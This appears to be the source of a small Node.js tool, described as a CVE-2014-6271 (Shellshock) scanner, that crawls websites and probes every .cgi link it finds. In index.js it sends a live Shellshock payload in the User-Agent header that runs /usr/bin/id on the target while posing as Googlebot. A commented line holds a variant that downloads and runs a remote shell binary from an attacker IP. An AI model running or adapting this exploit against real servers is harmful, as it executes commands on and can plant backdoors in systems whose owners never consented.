├── cli.js
├── package.json
└── index.js


/cli.js:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env node
 2 | 
 3 | var scanner = require('./index');
 4 | var argv = require('minimist')(process.argv.slice(2));
 5 | 
 6 | if (!argv._.length) {
 7 |   console.log('Please provide a url');
 8 |   process.exit(1);
 9 | }
10 | 
11 | scanner(argv._);
12 | 


--------------------------------------------------------------------------------
/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "CVE-2014-6271",
 3 |   "version": "0.1.0",
 4 |   "description": "CVE-2014-6271 scanner",
 5 |   "main": "index.js",
 6 |   "bin": {
 7 |     "cve6271": "cli.js"
 8 |   },
 9 |   "scripts": {
10 |     "test": "echo \"Error: no test specified\" && exit 1"
11 |   },
12 |   "author": "",
13 |   "license": "ISC",
14 |   "dependencies": {
15 |     "async": "^0.9.0",
16 |     "crawler": "^0.2.7",
17 |     "htmlparser": "^1.7.7",
18 |     "minimist": "^1.1.0",
19 |     "request": "^2.44.0",
20 |     "soupselect": "^0.2.0"
21 |   }
22 | }
23 | 


--------------------------------------------------------------------------------
/index.js:
--------------------------------------------------------------------------------
 1 | var util = require('util');
 2 | var request = require('request');
 3 | var async = require('async');
 4 | var select = require('soupselect').select;
 5 | var htmlparser = require("htmlparser");
 6 | 
 7 | var Crawler = require("crawler").Crawler;
 8 | 
 9 | 
10 | var s = async.queue(function(link, cb) {
11 |   console.log('scanner', link);
12 |   var marker = 'my-cve6271-test';
13 |   request({
14 |     url: link,
15 |     timeout: 3000,
16 |     headers: {
17 |       'Referrer': "http://www.google.com.hk/",
18 |       'User-Agent': util.format("() { :;};echo %s$(/usr/bin/id)%s", marker)
19 |       //'/usr/bin/wget xxx.xxx.xxx.xxx/shell1 -O /tmp/shell1 | /bin/chmod 777 /tmp/shell1 | /tmp/shell1" // download & execute shell
20 |     }
21 |   }, function(err, res, body) {
22 |     var reg = new RegExp(marker + '\\d+' + marker);
23 |     if (reg.test(body)) {
24 |       console.log('vuln', link);
25 |     }
26 |   });
27 | }, 5);
28 | 
29 | 
30 | var c = new Crawler({
31 |   maxConnections: 5,
32 |   userAgent: 'Googlebot/2.1',
33 |   timeout: 50000,
34 |   callback: function(error,result,$) {
35 |     if (error) {
36 |       console.log('error', error);
37 |       return;
38 |     }
39 | 
40 |     // $ is a jQuery instance scoped to the server-side DOM of the page
41 |     $("a").each(function(index,a) {
42 |       try {
43 |         if (/\.cgi/.test(a.href))
44 |             s.push(a.href);
45 | 
46 |         c.queue(a.href);
47 |       }catch(e) {
48 |         console.error(e);
49 |       }
50 |     });
51 |   }
52 | });
53 | 
54 | module.exports = function(url) {
55 |   console.log('enqueue', url);
56 |   c.queue(url);
57 | };
58 | 
59 | module.exports.scan = function(url) {
60 |   s.push(url);
61 | };
62 | 
63 | 
64 | 
65 | 


--------------------------------------------------------------------------------